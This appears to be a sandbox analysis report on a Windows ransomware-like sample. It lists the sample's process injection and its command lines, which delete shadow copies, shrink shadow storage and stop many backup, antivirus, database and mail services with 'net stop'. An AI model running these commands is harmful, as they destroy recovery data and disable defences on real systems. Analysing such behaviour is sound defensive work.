File opened for modification C:\Users\Admin\Searches\desktop.ini C:\Users\Admin\AppData\Local\Temp\2452cf5c6fccf361fa27131d9b261a60253eef8b96e6e2f524c85beea6488bd0.exe N/A
File opened for modification C:\Users\Public\Downloads\desktop.ini C:\Users\Admin\AppData\Local\Temp\2452cf5c6fccf361fa27131d9b261a60253eef8b96e6e2f524c85beea6488bd0.exe N/A
File opened for modification C:\Users\Admin\Contacts\desktop.ini C:\Users\Admin\AppData\Local\Temp\2452cf5c6fccf361fa27131d9b261a60253eef8b96e6e2f524c85beea6488bd0.exe N/A
File opened for modification C:\Users\Admin\Favorites\desktop.ini C:\Users\Admin\AppData\Local\Temp\2452cf5c6fccf361fa27131d9b261a60253eef8b96e6e2f524c85beea6488bd0.exe N/A
File opened for modification C:\Users\Admin\Favorites\Links\desktop.ini C:\Users\Admin\AppData\Local\Temp\2452cf5c6fccf361fa27131d9b261a60253eef8b96e6e2f524c85beea6488bd0.exe N/A
File opened for modification C:\Users\Admin\Music\desktop.ini C:\Users\Admin\AppData\Local\Temp\2452cf5c6fccf361fa27131d9b261a60253eef8b96e6e2f524c85beea6488bd0.exe N/A
File opened for modification C:\Users\Admin\Pictures\desktop.ini C:\Users\Admin\AppData\Local\Temp\2452cf5c6fccf361fa27131d9b261a60253eef8b96e6e2f524c85beea6488bd0.exe N/A

Runs net.exe

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\2452cf5c6fccf361fa27131d9b261a60253eef8b96e6e2f524c85beea6488bd0.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1872 wrote to memory of 1592 N/A C:\Users\Admin\AppData\Local\Temp\2452cf5c6fccf361fa27131d9b261a60253eef8b96e6e2f524c85beea6488bd0.exe C:\Windows\SysWOW64\cmd.exe
PID 1872 wrote to memory of 2368 N/A C:\Users\Admin\AppData\Local\Temp\2452cf5c6fccf361fa27131d9b261a60253eef8b96e6e2f524c85beea6488bd0.exe C:\Windows\SysWOW64\cmd.exe
PID 1872 wrote to memory of 2904 N/A C:\Users\Admin\AppData\Local\Temp\2452cf5c6fccf361fa27131d9b261a60253eef8b96e6e2f524c85beea6488bd0.exe C:\Windows\SysWOW64\cmd.exe
PID 1872 wrote to memory of 3436 N/A C:\Users\Admin\AppData\Local\Temp\2452cf5c6fccf361fa27131d9b261a60253eef8b96e6e2f524c85beea6488bd0.exe C:\Windows\SysWOW64\cmd.exe
PID 1872 wrote to memory of 4328 N/A C:\Users\Admin\AppData\Local\Temp\2452cf5c6fccf361fa27131d9b261a60253eef8b96e6e2f524c85beea6488bd0.exe C:\Windows\SysWOW64\cmd.exe
PID 1872 wrote to memory of 4736 N/A C:\Users\Admin\AppData\Local\Temp\2452cf5c6fccf361fa27131d9b261a60253eef8b96e6e2f524c85beea6488bd0.exe C:\Windows\SysWOW64\cmd.exe
PID 1872 wrote to memory of 2556 N/A C:\Users\Admin\AppData\Local\Temp\2452cf5c6fccf361fa27131d9b261a60253eef8b96e6e2f524c85beea6488bd0.exe C:\Windows\SysWOW64\cmd.exe
PID 1872 wrote to memory of 4676 N/A C:\Users\Admin\AppData\Local\Temp\2452cf5c6fccf361fa27131d9b261a60253eef8b96e6e2f524c85beea6488bd0.exe C:\Windows\SysWOW64\cmd.exe
PID 1872 wrote to memory of 1912 N/A C:\Users\Admin\AppData\Local\Temp\2452cf5c6fccf361fa27131d9b261a60253eef8b96e6e2f524c85beea6488bd0.exe C:\Windows\SysWOW64\cmd.exe
PID 1872 wrote to memory of 1560 N/A C:\Users\Admin\AppData\Local\Temp\2452cf5c6fccf361fa27131d9b261a60253eef8b96e6e2f524c85beea6488bd0.exe C:\Windows\SysWOW64\cmd.exe
PID 1872 wrote to memory of 3060 N/A C:\Users\Admin\AppData\Local\Temp\2452cf5c6fccf361fa27131d9b261a60253eef8b96e6e2f524c85beea6488bd0.exe C:\Windows\SysWOW64\cmd.exe
PID 1872 wrote to memory of 5076 N/A C:\Users\Admin\AppData\Local\Temp\2452cf5c6fccf361fa27131d9b261a60253eef8b96e6e2f524c85beea6488bd0.exe C:\Windows\SysWOW64\cmd.exe
PID 1872 wrote to memory of 3720 N/A C:\Users\Admin\AppData\Local\Temp\2452cf5c6fccf361fa27131d9b261a60253eef8b96e6e2f524c85beea6488bd0.exe C:\Windows\SysWOW64\cmd.exe
PID 1872 wrote to memory of 1756 N/A C:\Users\Admin\AppData\Local\Temp\2452cf5c6fccf361fa27131d9b261a60253eef8b96e6e2f524c85beea6488bd0.exe C:\Windows\SysWOW64\cmd.exe
PID 1872 wrote to memory of 4136 N/A C:\Users\Admin\AppData\Local\Temp\2452cf5c6fccf361fa27131d9b261a60253eef8b96e6e2f524c85beea6488bd0.exe C:\Windows\SysWOW64\cmd.exe
PID 4136 wrote to memory of 4416 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\net.exe
PID 4416 wrote to memory of 1464 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 1872 wrote to memory of 4776 N/A C:\Users\Admin\AppData\Local\Temp\2452cf5c6fccf361fa27131d9b261a60253eef8b96e6e2f524c85beea6488bd0.exe C:\Windows\SysWOW64\cmd.exe
PID 4776 wrote to memory of 1460 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\net.exe
PID 1460 wrote to memory of 2372 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 1872 wrote to memory of 2068 N/A C:\Users\Admin\AppData\Local\Temp\2452cf5c6fccf361fa27131d9b261a60253eef8b96e6e2f524c85beea6488bd0.exe C:\Windows\SysWOW64\cmd.exe
PID 2068 wrote to memory of 2508 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\net.exe

Processes

C:\Users\Admin\AppData\Local\Temp\2452cf5c6fccf361fa27131d9b261a60253eef8b96e6e2f524c85beea6488bd0.exe

"C:\Users\Admin\AppData\Local\Temp\2452cf5c6fccf361fa27131d9b261a60253eef8b96e6e2f524c85beea6488bd0.exe"

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c vssadmin Delete Shadows /all /quiet

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c vssadmin resize shadowstorage /for=c: /on=c: /maxsize=401MB

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c vssadmin resize shadowstorage /for=c: /on=c: /maxsize=unbounded

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c vssadmin resize shadowstorage /for=d: /on=d: /maxsize=401MB

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c vssadmin resize shadowstorage /for=d: /on=d: /maxsize=unbounded

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c vssadmin resize shadowstorage /for=e: /on=e: /maxsize=401MB

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c vssadmin resize shadowstorage /for=e: /on=e: /maxsize=unbounded

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c vssadmin resize shadowstorage /for=f: /on=f: /maxsize=401MB

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c vssadmin resize shadowstorage /for=f: /on=f: /maxsize=unbounded

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c vssadmin resize shadowstorage /for=g: /on=g: /maxsize=401MB

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c vssadmin resize shadowstorage /for=g: /on=g: /maxsize=unbounded

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c vssadmin resize shadowstorage /for=h: /on=h: /maxsize=401MB

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c vssadmin resize shadowstorage /for=h: /on=h: /maxsize=unbounded

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c vssadmin Delete Shadows /all /quiet

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop "Acronis VSS Provider" /y

C:\Windows\SysWOW64\net.exe

net stop "Acronis VSS Provider" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "Acronis VSS Provider" /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop "Enterprise Client Service" /y

C:\Windows\SysWOW64\net.exe

net stop "Enterprise Client Service" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "Enterprise Client Service" /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop "SQLsafe Backup Service" /y

C:\Windows\SysWOW64\net.exe

net stop "SQLsafe Backup Service" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "SQLsafe Backup Service" /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop "SQLsafe Filter Service" /y

C:\Windows\SysWOW64\net.exe

net stop "SQLsafe Filter Service" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "SQLsafe Filter Service" /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop "Veeam Backup Catalog Data Service" /y

C:\Windows\SysWOW64\net.exe

net stop "Veeam Backup Catalog Data Service" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "Veeam Backup Catalog Data Service" /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop AcronisAgent /y

C:\Windows\SysWOW64\net.exe

net stop AcronisAgent /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop AcronisAgent /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop AcrSch2Svc /y

C:\Windows\SysWOW64\net.exe

net stop AcrSch2Svc /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop AcrSch2Svc /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop Antivirus /y

C:\Windows\SysWOW64\net.exe

net stop Antivirus /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop Antivirus /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop ARSM /y

C:\Windows\SysWOW64\net.exe

net stop ARSM /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop ARSM /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop BackupExecAgentAccelerator /y

C:\Windows\SysWOW64\net.exe

net stop BackupExecAgentAccelerator /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop BackupExecAgentAccelerator /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop BackupExecAgentBrowser /y

C:\Windows\SysWOW64\net.exe

net stop BackupExecAgentBrowser /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop BackupExecAgentBrowser /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop BackupExecDeviceMediaService /y

C:\Windows\SysWOW64\net.exe

net stop BackupExecDeviceMediaService /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop BackupExecDeviceMediaService /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop BackupExecJobEngine /y

C:\Windows\SysWOW64\net.exe

net stop BackupExecJobEngine /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop BackupExecJobEngine /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop BackupExecManagementService /y

C:\Windows\SysWOW64\net.exe

net stop BackupExecManagementService /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop BackupExecManagementService /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop BackupExecRPCService /y

C:\Windows\SysWOW64\net.exe

net stop BackupExecRPCService /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop BackupExecRPCService /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop BackupExecVSSProvider /y

C:\Windows\SysWOW64\net.exe

net stop BackupExecVSSProvider /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop BackupExecVSSProvider /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop bedbg /y

C:\Windows\SysWOW64\net.exe

net stop bedbg /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop bedbg /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop DCAgent /y

C:\Windows\SysWOW64\net.exe

net stop DCAgent /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop DCAgent /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop EPSecurityService /y

C:\Windows\SysWOW64\net.exe

net stop EPSecurityService /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop EPSecurityService /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop EPUpdateService /y

C:\Windows\SysWOW64\net.exe

net stop EPUpdateService /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop EPUpdateService /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop EraserSvc11710 /y

C:\Windows\SysWOW64\net.exe

net stop EraserSvc11710 /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop EraserSvc11710 /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop EsgShKernel /y

C:\Windows\SysWOW64\net.exe

net stop EsgShKernel /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop EsgShKernel /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop FA_Scheduler /y

C:\Windows\SysWOW64\net.exe

net stop FA_Scheduler /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop FA_Scheduler /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop IISAdmin /y

C:\Windows\SysWOW64\net.exe

net stop IISAdmin /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop IISAdmin /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop IMAP4Svc /y

C:\Windows\SysWOW64\net.exe

net stop IMAP4Svc /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop IMAP4Svc /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop McShield /y

C:\Windows\SysWOW64\net.exe

net stop McShield /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop McShield /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop McTaskManager /y

C:\Windows\SysWOW64\net.exe

net stop McTaskManager /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop McTaskManager /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop mfemms /y

C:\Windows\SysWOW64\net.exe

net stop mfemms /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop mfemms /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop mfevtp /y

C:\Windows\SysWOW64\net.exe

net stop mfevtp /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop mfevtp /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop MMS /y

C:\Windows\SysWOW64\net.exe

net stop MMS /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop MMS /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop mozyprobackup /y

C:\Windows\SysWOW64\net.exe

net stop mozyprobackup /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop mozyprobackup /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop MsDtsServer /y

C:\Windows\SysWOW64\net.exe

net stop MsDtsServer /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop MsDtsServer /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop MsDtsServer100 /y

C:\Windows\SysWOW64\net.exe

net stop MsDtsServer100 /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop MsDtsServer100 /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop MsDtsServer110 /y

C:\Windows\SysWOW64\net.exe

net stop MsDtsServer110 /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop MsDtsServer110 /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop MSExchangeES /y

C:\Windows\SysWOW64\net.exe

net stop MSExchangeES /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop MSExchangeES /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop MSExchangeIS /y

C:\Windows\SysWOW64\net.exe

net stop MSExchangeIS /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop MSExchangeIS /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop MSExchangeMGMT /y

C:\Windows\SysWOW64\net.exe

net stop MSExchangeMGMT /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop MSExchangeMGMT /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop MSExchangeMTA /y

C:\Windows\SysWOW64\net.exe

net stop MSExchangeMTA /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop MSExchangeMTA /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop MSExchangeSA /y

C:\Windows\SysWOW64\net.exe

net stop MSExchangeSA /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop MSExchangeSA /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop MSExchangeSRS /y

C:\Windows\SysWOW64\net.exe

net stop MSExchangeSRS /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop MSExchangeSRS /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop MSOLAP$SQL_2008 /y

C:\Windows\SysWOW64\net.exe

net stop MSOLAP$SQL_2008 /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop MSOLAP$SQL_2008 /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop MSOLAP$SYSTEM_BGC /y

C:\Windows\SysWOW64\net.exe

net stop MSOLAP$SYSTEM_BGC /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop MSOLAP$SYSTEM_BGC /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop MSOLAP$TPS /y

C:\Windows\SysWOW64\net.exe

net stop MSOLAP$TPS /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop MSOLAP$TPS /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop MSOLAP$TPSAMA /y

C:\Windows\SysWOW64\net.exe

net stop MSOLAP$TPSAMA /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop MSOLAP$TPSAMA /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop MSSQL$BKUPEXEC /y

C:\Windows\SysWOW64\net.exe

net stop MSSQL$BKUPEXEC /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop MSSQL$BKUPEXEC /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop MSSQL$ECWDB2 /y

C:\Windows\SysWOW64\net.exe

net stop MSSQL$ECWDB2 /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop MSSQL$ECWDB2 /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop MSSQL$PRACTICEMGT /y

C:\Windows\SysWOW64\net.exe

net stop MSSQL$PRACTICEMGT /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop MSSQL$PRACTICEMGT /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop MSSQL$PRACTTICEBGC /y

C:\Windows\SysWOW64\net.exe

net stop MSSQL$PRACTTICEBGC /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop MSSQL$PRACTTICEBGC /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop MSSQL$PROFXENGAGEMENT /y

C:\Windows\SysWOW64\net.exe

net stop MSSQL$PROFXENGAGEMENT /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop MSSQL$PROFXENGAGEMENT /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop MSSQL$SBSMONITORING /y

C:\Windows\SysWOW64\net.exe

net stop MSSQL$SBSMONITORING /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop MSSQL$SBSMONITORING /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop MSSQL$SHAREPOINT /y

C:\Windows\SysWOW64\net.exe

net stop MSSQL$SHAREPOINT /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop MSSQL$SHAREPOINT /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop MSSQL$SQL_2008 /y

C:\Windows\SysWOW64\net.exe

net stop MSSQL$SQL_2008 /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop MSSQL$SQL_2008 /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop MSSQL$SYSTEM_BGC /y

C:\Windows\SysWOW64\net.exe

net stop MSSQL$SYSTEM_BGC /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop MSSQL$SYSTEM_BGC /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop MSSQL$TPS /y

C:\Windows\SysWOW64\net.exe

net stop MSSQL$TPS /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop MSSQL$TPS /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop MSSQL$TPSAMA /y

C:\Windows\SysWOW64\net.exe

net stop MSSQL$TPSAMA /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop MSSQL$TPSAMA /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop MSSQL$VEEAMSQL2008R2 /y

C:\Windows\SysWOW64\net.exe

net stop MSSQL$VEEAMSQL2008R2 /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop MSSQL$VEEAMSQL2008R2 /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop MSSQL$VEEAMSQL2012 /y

C:\Windows\SysWOW64\net.exe

net stop MSSQL$VEEAMSQL2012 /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop MSSQL$VEEAMSQL2012 /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop MSSQLFDLauncher /y

C:\Windows\SysWOW64\net.exe

net stop MSSQLFDLauncher /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop MSSQLFDLauncher /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop MSSQLFDLauncher$PROFXENGAGEMENT /y

C:\Windows\SysWOW64\net.exe

net stop MSSQLFDLauncher$PROFXENGAGEMENT /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop MSSQLFDLauncher$PROFXENGAGEMENT /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop MSSQLFDLauncher$SBSMONITORING /y

C:\Windows\SysWOW64\net.exe

net stop MSSQLFDLauncher$SBSMONITORING /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop MSSQLFDLauncher$SBSMONITORING /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop MSSQLFDLauncher$SHAREPOINT /y

C:\Windows\SysWOW64\net.exe

net stop MSSQLFDLauncher$SHAREPOINT /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop MSSQLFDLauncher$SHAREPOINT /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop MSSQLFDLauncher$SQL_2008 /y

C:\Windows\SysWOW64\net.exe

net stop MSSQLFDLauncher$SQL_2008 /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop MSSQLFDLauncher$SQL_2008 /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop MSSQLFDLauncher$SYSTEM_BGC /y

C:\Windows\SysWOW64\net.exe

net stop MSSQLFDLauncher$SYSTEM_BGC /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop MSSQLFDLauncher$SYSTEM_BGC /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop MSSQLFDLauncher$TPS /y

C:\Windows\SysWOW64\net.exe

net stop MSSQLFDLauncher$TPS /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop MSSQLFDLauncher$TPS /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop MSSQLFDLauncher$TPSAMA /y

C:\Windows\SysWOW64\net.exe

net stop MSSQLFDLauncher$TPSAMA /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop MSSQLFDLauncher$TPSAMA /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop MSSQLSERVER /y

C:\Windows\SysWOW64\net.exe

net stop MSSQLSERVER /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop MSSQLSERVER /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop MSSQLServerADHelper100 /y

C:\Windows\SysWOW64\net.exe

net stop MSSQLServerADHelper100 /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop MSSQLServerADHelper100 /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop MSSQLServerOLAPService /y

C:\Windows\SysWOW64\net.exe

net stop MSSQLServerOLAPService /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop MSSQLServerOLAPService /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop MySQL57 /y

C:\Windows\SysWOW64\net.exe

net stop MySQL57 /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop MySQL57 /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop ntrtscan /y

C:\Windows\SysWOW64\net.exe

net stop ntrtscan /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop ntrtscan /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop OracleClientCache80 /y

C:\Windows\SysWOW64\net.exe

net stop OracleClientCache80 /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop OracleClientCache80 /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop PDVFSService /y

C:\Windows\SysWOW64\net.exe

net stop PDVFSService /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop PDVFSService /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop POP3Svc /y

C:\Windows\SysWOW64\net.exe

net stop POP3Svc /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop POP3Svc /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop ReportServer /y

C:\Windows\SysWOW64\net.exe

net stop ReportServer /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop ReportServer /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop ReportServer$SQL_2008 /y

C:\Windows\SysWOW64\net.exe

net stop ReportServer$SQL_2008 /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop ReportServer$SQL_2008 /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop ReportServer$SYSTEM_BGC /y

C:\Windows\SysWOW64\net.exe

net stop ReportServer$SYSTEM_BGC /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop ReportServer$SYSTEM_BGC /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop ReportServer$TPS /y

C:\Windows\SysWOW64\net.exe

net stop ReportServer$TPS /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop ReportServer$TPS /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop ReportServer$TPSAMA /y

C:\Windows\SysWOW64\net.exe

net stop ReportServer$TPSAMA /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop ReportServer$TPSAMA /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop RESvc /y

C:\Windows\SysWOW64\net.exe

net stop RESvc /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop RESvc /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop sacsvr /y

C:\Windows\SysWOW64\net.exe

net stop sacsvr /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop sacsvr /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop SamSs /y

C:\Windows\SysWOW64\net.exe

net stop SamSs /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop SamSs /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop SAVAdminService /y

C:\Windows\SysWOW64\net.exe

net stop SAVAdminService /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop SAVAdminService /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop SAVService /y

C:\Windows\SysWOW64\net.exe

net stop SAVService /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop SAVService /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop SDRSVC /y

C:\Windows\SysWOW64\net.exe

net stop SDRSVC /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop SDRSVC /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop SepMasterService /y

C:\Windows\SysWOW64\net.exe

net stop SepMasterService /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop SepMasterService /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop ShMonitor /y

C:\Windows\SysWOW64\net.exe

net stop ShMonitor /y

C:\Windows\SysWOW64\net1.exe

